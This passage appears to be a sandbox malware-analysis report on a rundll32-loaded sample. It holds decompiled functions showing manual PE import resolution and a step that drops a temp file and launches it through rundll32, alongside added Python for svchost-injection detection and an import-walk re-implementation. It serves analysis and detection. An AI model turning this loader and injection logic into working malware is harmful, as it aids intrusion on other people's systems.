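# starts %SystemRoot%\System32\svchost.exe itself and then creates a remote
# thread in it.  Event shapes follow Sysmon event 1 (process create) and
# event 8 (CreateRemoteThread); the field names below are this example's own.

@dataclass
class Event:
    event_id: int                     # 1 = process create, 8 = CreateRemoteThread
    pid: int                          # acting process
    image: str                        # acting process image path
    parent_pid: Optional[int] = None  # event 1 only
    target_pid: Optional[int] = None  # event 8 only: process receiving the thread

# svchost.exe is normally started by the Service Control Manager; tune for your estate.
EXPECTED_SVCHOST_PARENTS = {"services.exe"}

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def detect_svchost_injection(events: List[Event]) -> List[Tuple[str, str, int, int]]:
    """Return (rule, acting_image, acting_pid, svchost_pid) tuples."""
    procs = {}   # pid -> process-create event, so parents can be looked up later
    alerts = []
    for ev in events:
        if ev.event_id == 1:
            procs[ev.pid] = ev
            if basename(ev.image) == "svchost.exe":
                parent = procs.get(ev.parent_pid)
                pname = basename(parent.image) if parent else "<unknown>"
                if pname not in EXPECTED_SVCHOST_PARENTS:
                    alerts.append(("svchost_spawned_by_unexpected_parent", pname, ev.parent_pid, ev.pid))
        elif ev.event_id == 8:
            target = procs.get(ev.target_pid)
            # A remote thread into an svchost the same process just created is the
            # VirtualAllocEx / WriteProcessMemory / CreateRemoteThread sequence above.
            if target and basename(target.image) == "svchost.exe" and target.parent_pid == ev.pid:
                alerts.append(("remote_thread_into_self_spawned_svchost", basename(ev.image), ev.pid, ev.target_pid))
    return alerts

# Constructed event stream: one legitimate svchost start, then a chain shaped like
# the report's (Office -> rundll32 -> svchost, followed by CreateRemoteThread into it).
SAMPLE_EVENTS = [
    Event(1, 600, r"C:\Windows\System32\services.exe", parent_pid=500),
    Event(1, 700, r"C:\Windows\System32\svchost.exe", parent_pid=600),
    Event(1, 4000, r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE", parent_pid=3000),
    Event(1, 5000, r"C:\Windows\SysWOW64\rundll32.exe", parent_pid=4000),
    Event(1, 5100, r"C:\Windows\System32\svchost.exe", parent_pid=5000),
    Event(8, 5000, r"C:\Windows\SysWOW64\rundll32.exe", target_pid=5100),
]

if __name__ == "__main__":
    for alert in detect_svchost_injection(SAMPLE_EVENTS):
        print(alert)
```

The second rule is the stronger one: an unexpected svchost parent on its own produces noise from installers and management agents, but a CreateRemoteThread from the parent into its own freshly created svchost.exe has little legitimate use. Real telemetry needs the parent lookup to survive PID reuse (key on process GUID rather than PID) and, for 32-bit loaders on 64-bit Windows, to accept the SysWOW64 svchost path as well.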

                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32 ref: 0034CC47
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0034CC5C
                                                  • UnhandledExceptionFilter.KERNEL32(003593AC), ref: 0034CC67
                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 0034CC83
                                                  • TerminateProcess.KERNEL32(00000000), ref: 0034CC8A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348568952.000000000034A000.00000020.00020000.sdmp, Offset: 0034A000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_34a000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                  • String ID:
                                                  • API String ID: 2579439406-0
                                                  • Opcode ID: ef4e8b3e93a5e6b76ea8b9dc20ca3abec37de38dd6b74ea16005d52e05e4448b
                                                  • Instruction ID: c9958013b3a52880d25e6d9c35b32e6b97af3731df35ad85d5d05776307b165c
                                                  • Opcode Fuzzy Hash: ef4e8b3e93a5e6b76ea8b9dc20ca3abec37de38dd6b74ea16005d52e05e4448b
                                                  • Instruction Fuzzy Hash: 2121BFB8A11304DFC703DF2AED846547BACBB08315F50D41AE80987261EBF069848F5A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00343580(intOrPtr _a4) {
                                                  				intOrPtr* _v8;
                                                  				struct HINSTANCE__* _v12;
                                                  				void* _v16;
                                                  				signed int* _v20;
                                                  				_Unknown_base(*)()* _v24;
                                                  				CHAR* _v28;
                                                  				intOrPtr _v32;
                                                  				intOrPtr _v36;
                                                  				intOrPtr* _v40;
                                                  				intOrPtr _v44;
                                                  				intOrPtr _v48;
                                                  
                                                  				_v32 = _a4;
                                                  				_v36 = _a4 +  *((intOrPtr*)(_v32 + 0x3c));
                                                  				_v40 = _v36 + 0xbadc25;
                                                  				_v44 =  *_v40;
                                                  				_v8 = _a4 + _v44;
                                                  				while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                  					_v28 = _a4 +  *((intOrPtr*)(_v8 + 0xc));
                                                  					_v12 = 0;
                                                  					_v12 = GetModuleHandleA(_v28);
                                                  					if(_v12 == 0) {
                                                  						_v12 = LoadLibraryA(_v28);
                                                  					}
                                                  					if(_v12 != 0) {
                                                  						_v16 = _a4 +  *((intOrPtr*)(_v8 + 0x10));
                                                  						_v20 = _a4 +  *_v8;
                                                  						if( *_v8 == 0) {
                                                  							_v20 = _v16;
                                                  						}
                                                  						while( *_v16 != 0) {
                                                  							_v48 = _a4 +  *_v20;
                                                  							_v24 = 0;
                                                  							if(( *_v20 & 0x80000000) == 0) {
                                                  								_v24 = GetProcAddress(_v12, _v48 + 2);
                                                  							} else {
                                                  								_v24 = GetProcAddress(_v12,  *_v20 & 0x0000ffff);
                                                  							}
                                                  							if( *_v16 != _v24) {
                                                  								 *_v16 = _v24;
                                                  							}
                                                  							_v16 = _v16 + 4;
                                                  							_v20 =  &(_v20[1]);
                                                  						}
                                                  						_v8 = _v8 + 0x14;
                                                  						continue;
                                                  					} else {
                                                  						return 0;
                                                  					}
                                                  				}
                                                  				return 1;
                                                   			}

                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?), ref: 003435DF
                                                  • LoadLibraryA.KERNEL32(?), ref: 003435F2
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00343663
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00343679
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                   • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp
                                                   • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp
                                                   • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp
                                                   • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$HandleLibraryLoadModule
                                                  • String ID:
                                                  • API String ID: 384173800-0
                                                  • Opcode ID: 309d741347cd8536c3b859be301394d8e31844ac3f8805327c234dcc6dd952e4
                                                  • Instruction ID: 089d8c1d185ff386aa56c9832ee8947ac2c053ec088971c44c118d4504fe4fc5
                                                  • Opcode Fuzzy Hash: 309d741347cd8536c3b859be301394d8e31844ac3f8805327c234dcc6dd952e4
                                                  • Instruction Fuzzy Hash: 8241A674E00209EFDB05CF98C594BADBBB5FF48304F218599D915AB354D734AA41CF94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
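
E00343580 is a manual import fix-up for a PE the sample has mapped itself: it walks the IMAGE_IMPORT_DESCRIPTOR array in 0x14-byte steps, loads each named DLL (GetModuleHandleA, then LoadLibraryA), and for every thunk either resolves by ordinal (high bit set, low 16 bits used) or by name (IMAGE_IMPORT_BY_NAME, skipping the 2-byte hint), writing the result into the IAT. Falling back to the IAT when OriginalFirstThunk is zero is the same `_v20 = _v16` branch shown above. The following is an added example, not code from the sample or the report: a pure-Python re-implementation of that walk over a constructed in-memory image, with a dict of made-up export tables standing in for GetProcAddress. It takes the import-directory RVA as a parameter instead of reading it from the optional header, so the directory-lookup constant in the decompiled listing is not reproduced.

```python
import struct

# Added example, not code from the sample or the sandbox report: a pure-Python
# re-implementation of the import-table walk that E00343580 performs when it
# fixes up a manually mapped PE.  A bytearray indexed by RVA stands in for the
# mapped image and a dict of fake export tables stands in for
# GetModuleHandleA/LoadLibraryA + GetProcAddress.  The import-directory RVA is
# passed in directly rather than read from the optional header.

IMAGE_ORDINAL_FLAG32 = 0x80000000   # the bit tested by "*_v20 & 0x80000000"
DESCRIPTOR_SIZE = 0x14              # sizeof(IMAGE_IMPORT_DESCRIPTOR), the "+0x14" stride

# Constructed stand-in for the loaded modules' export tables (addresses are made up).
FAKE_MODULES = {
    "kernel32.dll": {"VirtualAlloc": 0x7C809AE1, "CreateThread": 0x7C810637},
    "advapi32.dll": {5: 0x77DD1234},           # export reached by ordinal
}

def cstr(img, rva):
    """Read a NUL-terminated ASCII string at the given RVA."""
    return bytes(img[rva:img.index(b"\0", rva)]).decode()

def build_image(imports):
    """Construct a minimal 'image' containing only an import directory.
    imports maps DLL name -> list of function names (str) or ordinals (int).
    Returns (image, import_directory_rva)."""
    img = bytearray(0x1000)
    cursor = 0x200
    def put(data):
        nonlocal cursor
        rva = cursor
        img[rva:rva + len(data)] = data
        cursor += len(data) + (-len(data) % 4)   # keep thunk arrays 4-byte aligned
        return rva
    descriptors = b""
    for dll, entries in imports.items():
        name_rva = put(dll.encode() + b"\0")
        thunks = []
        for entry in entries:
            if isinstance(entry, int):
                thunks.append(IMAGE_ORDINAL_FLAG32 | entry)
            else:
                # IMAGE_IMPORT_BY_NAME: WORD hint, then the NUL-terminated name
                thunks.append(put(struct.pack("<H", 0) + entry.encode() + b"\0"))
        thunks.append(0)
        packed = struct.pack("<%dI" % len(thunks), *thunks)
        int_rva = put(packed)   # OriginalFirstThunk (import name table)
        iat_rva = put(packed)   # FirstThunk (IAT, overwritten with addresses below)
        descriptors += struct.pack("<IIIII", int_rva, 0, 0, name_rva, iat_rva)
    descriptors += bytes(DESCRIPTOR_SIZE)   # all-zero terminating descriptor
    return img, put(descriptors)

def resolve_imports(img, dir_rva, modules):
    """Patch the IAT in place the way E00343580 does.  Returns False when a DLL
    cannot be 'loaded', mirroring the function's early 'return 0'."""
    u32 = lambda rva: struct.unpack_from("<I", img, rva)[0]
    desc = dir_rva
    while u32(desc + 0xC) != 0:                 # loop until Name == 0
        exports = modules.get(cstr(img, u32(desc + 0xC)).lower())
        if exports is None:
            return False
        iat = u32(desc + 0x10)                  # FirstThunk
        lookup = u32(desc) or iat               # OriginalFirstThunk, else fall back to the IAT
        while u32(iat) != 0:
            entry = u32(lookup)
            if entry & IMAGE_ORDINAL_FLAG32:
                key = entry & 0xFFFF            # import by ordinal
            else:
                key = cstr(img, entry + 2)      # import by name: skip the WORD hint
            struct.pack_into("<I", img, iat, exports.get(key, 0))
            iat += 4
            lookup += 4
        desc += DESCRIPTOR_SIZE
    return True

def read_iat(img, dir_rva):
    """Return {dll: [IAT slot values]} so the fix-up can be inspected."""
    u32 = lambda rva: struct.unpack_from("<I", img, rva)[0]
    out, desc = {}, dir_rva
    while u32(desc + 0xC) != 0:
        iat, slots = u32(desc + 0x10), []
        while u32(iat) != 0:
            slots.append(u32(iat))
            iat += 4
        out[cstr(img, u32(desc + 0xC))] = slots
        desc += DESCRIPTOR_SIZE
    return out

if __name__ == "__main__":
    image, rva = build_image({"kernel32.dll": ["VirtualAlloc", "CreateThread"], "advapi32.dll": [5]})
    print("resolved:", resolve_imports(image, rva, FAKE_MODULES))
    print({k: [hex(v) for v in vals] for k, vals in read_iat(image, rva).items()})
```

Two details worth noticing because they are what a loader signature keys on: the walk is driven by the name field of each descriptor rather than by a size, and the name/ordinal split relies on the 32-bit ordinal flag, so the routine only handles 32-bit images (the 64-bit flag and 8-byte thunks would need a separate path). An unresolvable export is written as zero and the loop simply moves on, which leaves a null IAT slot for a later crash rather than an error.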

                                                  C-Code - Quality: 58%
                                                  			E00342D17() {
                                                  				void* _t17;
                                                  
                                                  				if( *(_t17 - 4) != 0) {
                                                  					__imp__CryptDestroyHash( *(_t17 - 4));
                                                  					 *(_t17 - 4) = 0;
                                                  				}
                                                  				if( *(_t17 - 0xc) != 0) {
                                                  					CryptDestroyKey( *(_t17 - 0xc));
                                                  					 *(_t17 - 0xc) = 0;
                                                  				}
                                                  				if( *(_t17 - 8) != 0) {
                                                  					CryptReleaseContext( *(_t17 - 8), 0);
                                                  					 *(_t17 - 8) = 0;
                                                  				}
                                                  				return  *((intOrPtr*)(_t17 - 0x10));
                                                   			}

                                                  APIs
                                                  • CryptDestroyHash.ADVAPI32(00000000), ref: 00342DAA
                                                  • CryptDestroyKey.ADVAPI32(00000000), ref: 00342DC1
                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00342DDA
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                   • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp
                                                   • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp
                                                   • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp
                                                   • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Crypt$Destroy$ContextHashRelease
                                                  • String ID:
                                                  • API String ID: 3577760690-0
                                                  • Opcode ID: 64028113b29cd324a4c0f9119a74aea3742cb22dfbe62ccea184960067200f22
                                                  • Instruction ID: 2b58769ee976deceda4b49febfafa49f3802f82a6efa2c637fd61bc6ba77f7ba
                                                  • Opcode Fuzzy Hash: 64028113b29cd324a4c0f9119a74aea3742cb22dfbe62ccea184960067200f22
                                                  • Instruction Fuzzy Hash: 62F01C78D00208EBDF22CF94D84CBAEBBB4EB05305F508098F5117A390C7796A44DF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 58%
                                                  			E00342D98() {
                                                  				void* _t17;
                                                  
                                                  				if( *(_t17 - 4) != 0) {
                                                  					__imp__CryptDestroyHash( *(_t17 - 4));
                                                  					 *(_t17 - 4) = 0;
                                                  				}
                                                  				if( *(_t17 - 0xc) != 0) {
                                                  					CryptDestroyKey( *(_t17 - 0xc));
                                                  					 *(_t17 - 0xc) = 0;
                                                  				}
                                                  				if( *(_t17 - 8) != 0) {
                                                  					CryptReleaseContext( *(_t17 - 8), 0);
                                                  					 *(_t17 - 8) = 0;
                                                  				}
                                                  				return  *((intOrPtr*)(_t17 - 0x10));
                                                   			}

                                                  APIs
                                                  • CryptDestroyHash.ADVAPI32(00000000), ref: 00342DAA
                                                  • CryptDestroyKey.ADVAPI32(00000000), ref: 00342DC1
                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00342DDA
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                   • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp
                                                   • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp
                                                   • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp
                                                   • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Crypt$Destroy$ContextHashRelease
                                                  • String ID:
                                                  • API String ID: 3577760690-0
                                                  • Opcode ID: b95e167d2763c6dc185f490256ca1faf6cd1fe1659b628589e0af0351b352042
                                                  • Instruction ID: 2b58769ee976deceda4b49febfafa49f3802f82a6efa2c637fd61bc6ba77f7ba
                                                  • Opcode Fuzzy Hash: b95e167d2763c6dc185f490256ca1faf6cd1fe1659b628589e0af0351b352042
                                                  • Instruction Fuzzy Hash: 62F01C78D00208EBDF22CF94D84CBAEBBB4EB05305F508098F5117A390C7796A44DF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 58%
                                                  			E00342D78() {
                                                  				void* _t17;
                                                  
                                                  				if( *(_t17 - 4) != 0) {
                                                  					__imp__CryptDestroyHash( *(_t17 - 4));
                                                  					 *(_t17 - 4) = 0;
                                                  				}
                                                  				if( *(_t17 - 0xc) != 0) {
                                                  					CryptDestroyKey( *(_t17 - 0xc));
                                                  					 *(_t17 - 0xc) = 0;
                                                  				}
                                                  				if( *(_t17 - 8) != 0) {
                                                  					CryptReleaseContext( *(_t17 - 8), 0);
                                                  					 *(_t17 - 8) = 0;
                                                  				}
                                                  				return  *((intOrPtr*)(_t17 - 0x10));
                                                  			}





                                                  APIs
                                                  • CryptDestroyHash.ADVAPI32(00000000), ref: 00342DAA
                                                  • CryptDestroyKey.ADVAPI32(00000000), ref: 00342DC1
                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00342DDA
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Crypt$Destroy$ContextHashRelease
                                                  • String ID:
                                                  • API String ID: 3577760690-0
                                                  • Opcode ID: 812e30b5683bf31b9674e91e2017c073e0de185cddec408f0a37af6f5817e099
                                                  • Instruction ID: 2b58769ee976deceda4b49febfafa49f3802f82a6efa2c637fd61bc6ba77f7ba
                                                  • Opcode Fuzzy Hash: 812e30b5683bf31b9674e91e2017c073e0de185cddec408f0a37af6f5817e099
                                                  • Instruction Fuzzy Hash: 62F01C78D00208EBDF22CF94D84CBAEBBB4EB05305F508098F5117A390C7796A44DF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 58%
                                                  			E00342D55() {
                                                  				void* _t17;
                                                  
                                                  				if( *(_t17 - 4) != 0) {
                                                  					__imp__CryptDestroyHash( *(_t17 - 4));
                                                  					 *(_t17 - 4) = 0;
                                                  				}
                                                  				if( *(_t17 - 0xc) != 0) {
                                                  					CryptDestroyKey( *(_t17 - 0xc));
                                                  					 *(_t17 - 0xc) = 0;
                                                  				}
                                                  				if( *(_t17 - 8) != 0) {
                                                  					CryptReleaseContext( *(_t17 - 8), 0);
                                                  					 *(_t17 - 8) = 0;
                                                  				}
                                                  				return  *((intOrPtr*)(_t17 - 0x10));
                                                  			}





                                                  APIs
                                                  • CryptDestroyHash.ADVAPI32(00000000), ref: 00342DAA
                                                  • CryptDestroyKey.ADVAPI32(00000000), ref: 00342DC1
                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00342DDA
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Crypt$Destroy$ContextHashRelease
                                                  • String ID:
                                                  • API String ID: 3577760690-0
                                                  • Opcode ID: dd36a8368929776a62e2388577fc631267f7545daf511757283aa524fe086b8f
                                                  • Instruction ID: 2b58769ee976deceda4b49febfafa49f3802f82a6efa2c637fd61bc6ba77f7ba
                                                  • Opcode Fuzzy Hash: dd36a8368929776a62e2388577fc631267f7545daf511757283aa524fe086b8f
                                                  • Instruction Fuzzy Hash: 62F01C78D00208EBDF22CF94D84CBAEBBB4EB05305F508098F5117A390C7796A44DF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • __decode_pointer.LIBCMT ref: 0035204C
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00352053
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348568952.000000000034A000.00000020.00020000.sdmp, Offset: 0034A000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_34a000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled__decode_pointer
                                                  • String ID:
                                                  • API String ID: 3341406909-0
                                                  • Opcode ID: 10f5fb23b7dc3b145ff4bd90bb2514b4662c4f61d87a2194d3cfc2f4838be236
                                                  • Instruction ID: db12bb5454fc9ba2572ff6d388325f8020aed160210235ef216cb84c5b75f7fa
                                                  • Opcode Fuzzy Hash: 10f5fb23b7dc3b145ff4bd90bb2514b4662c4f61d87a2194d3cfc2f4838be236
                                                  • Instruction Fuzzy Hash: 01C04C5AD183C08ADB035778584D3097E58A755711F54C8AAD4418B1DAD5B550448721
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348607784.000000000036E000.00000040.00020000.sdmp, Offset: 0036E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36e000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                                  • Instruction ID: 5edd3c0a585ef12230ed7a51e5f985dc970b42ac7d04810d29abdc78883e6dd0
                                                  • Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                                  • Instruction Fuzzy Hash: FC1193773401019FD715DE59EC91EA2B3DAFB99330B298066ED08CB709E636EC45C760
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348607784.000000000036E000.00000040.00020000.sdmp, Offset: 0036E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36e000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
                                                  • Instruction ID: 3335f81738259b148cc70259dc3b37ca20f842685e04328b773a6cb53c927733
                                                  • Opcode Fuzzy Hash: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
                                                  • Instruction Fuzzy Hash: 9701D67B314240CFDB1ACF98D994D79B7E8FBC1324B1AC07EC44687619E130E949CA20
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(0035943C,?,0034BF21,?,0036D2FC,00000000,?,?,?,0036B0A8,0036D2FC), ref: 0034EC43
                                                  • __mtterm.LIBCMT ref: 0034EC4F
                                                    • Part of subcall function 0034E927: __decode_pointer.LIBCMT ref: 0034E938
                                                    • Part of subcall function 0034E927: TlsFree.KERNEL32(0036CB74,0034BFBD,?,0036D2FC,00000000,?,?,?,0036B0A8,0036D2FC), ref: 0034E952
                                                  • TlsAlloc.KERNEL32(?,0036D2FC,00000000,?,?,?,0036B0A8,0036D2FC), ref: 0034ECDC
                                                  • __init_pointers.LIBCMT ref: 0034ED01
                                                  • __encode_pointer.LIBCMT ref: 0034ED0C
                                                  • __encode_pointer.LIBCMT ref: 0034ED1C
                                                  • __encode_pointer.LIBCMT ref: 0034ED2C
                                                  • __encode_pointer.LIBCMT ref: 0034ED3C
                                                  • __decode_pointer.LIBCMT ref: 0034ED5D
                                                  • __calloc_crt.LIBCMT ref: 0034ED76
                                                  • __decode_pointer.LIBCMT ref: 0034ED90
                                                  • GetCurrentThreadId.KERNEL32(?,?,0036B0A8,0036D2FC), ref: 0034EDA6
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348568952.000000000034A000.00000020.00020000.sdmp, Offset: 0034A000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_34a000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: __encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThread__calloc_crt__init_pointers__mtterm
                                                  • String ID:
                                                  • API String ID: 802150526-0
                                                  • Opcode ID: 2c620d458e02ec8f2caabef93c83b991a21ace09dcc18aac44f7e878ca7cbcb1
                                                  • Instruction ID: 1a37ac7d69bfdadbb0315593c10cd4e77f15de5ebcc966dc6a41cc0e3c486a28
                                                  • Opcode Fuzzy Hash: 2c620d458e02ec8f2caabef93c83b991a21ace09dcc18aac44f7e878ca7cbcb1
                                                  • Instruction Fuzzy Hash: 19319371E00311DECB13BF75EC0AA567BE8BB05761F85862AE8499E1F0EBF1A400CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • __lock.LIBCMT ref: 0034C725
                                                    • Part of subcall function 00352F42: __mtinitlocknum.LIBCMT ref: 00352F56
                                                    • Part of subcall function 00352F42: __amsg_exit.LIBCMT ref: 00352F62
                                                    • Part of subcall function 00352F42: RtlEnterCriticalSection.NTDLL(FCBE00F1), ref: 00352F6A
                                                  • ___sbh_find_block.LIBCMT ref: 0034C730
                                                  • ___sbh_free_block.LIBCMT ref: 0034C73F
                                                  • HeapFree.KERNEL32(00000000,0034BE12,0036AB38), ref: 0034C76F
                                                  • GetLastError.KERNEL32(?,?,0034D16F,0034D31B,?,0034BE12,?), ref: 0034C780
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348568952.000000000034A000.00000020.00020000.sdmp, Offset: 0034A000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_34a000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                  • String ID:
                                                  • API String ID: 2714421763-0
                                                  • Opcode ID: 1a1a8092bec646c9bfd204203466ea82da0f5837488635d065254ea0ac1bd00f
                                                  • Instruction ID: 8556e8749aac61c6ed4efdcf7043c2161d8d897620f00d12494a3a1a1d32b761
                                                  • Opcode Fuzzy Hash: 1a1a8092bec646c9bfd204203466ea82da0f5837488635d065254ea0ac1bd00f
                                                  • Instruction Fuzzy Hash: 91018F31906205AFDB737BB0AC0AB5E7AE4AF01761F109015F900AE1A1CB74A5408EA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 86%
                                                  			E00343B30(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                  				char _v264;
                                                  				char _v524;
                                                  				char _v784;
                                                  
                                                  				GetTempPathA(0x104,  &_v524);
                                                  				GetTempFileNameA( &_v524, "BN", 0,  &_v264);
                                                  				if(E00343AC0(_a4,  &_v264, _a4, _a8) != 1) {
                                                  					return 0;
                                                  				}
                                                  				_push(_a8);
                                                  				if(E003433C0(_a4) != 1) {
                                                  					return E003436C0( &_v264);
                                                  				}
                                                  				wsprintfA( &_v784, "Rundll32.exe %s, start",  &_v264);
                                                  				return E003436C0( &_v784);
                                                  			}







                                                  APIs
                                                  • GetTempPathA.KERNEL32(00000104,?), ref: 00343B45
                                                  • GetTempFileNameA.KERNEL32(?,003442C0,00000000,?), ref: 00343B60
                                                    • Part of subcall function 00343AC0: CreateFileA.KERNEL32(00341691,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00343AE6
                                                    • Part of subcall function 00343AC0: WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 00343B07
                                                    • Part of subcall function 00343AC0: CloseHandle.KERNEL32(000000FF), ref: 00343B11
                                                  • wsprintfA.USER32 ref: 00343BAA
                                                    • Part of subcall function 003436C0: CreateProcessA.KERNEL32(00000000,00343BD2,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 003436F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CreateTemp$CloseHandleNamePathProcessWritewsprintf
                                                  • String ID: Rundll32.exe %s, start
                                                  • API String ID: 130250823-2967502992
                                                  • Opcode ID: 2d77852d958fb0e5b4b89deaaf5be51f9f88daea29ce30dfb51db1c519f10060
                                                  • Instruction ID: d95ae778d5a6352f93819d5a81dc35fc5c6bbfc738c7438807b97f4c21ba852e
                                                  • Opcode Fuzzy Hash: 2d77852d958fb0e5b4b89deaaf5be51f9f88daea29ce30dfb51db1c519f10060
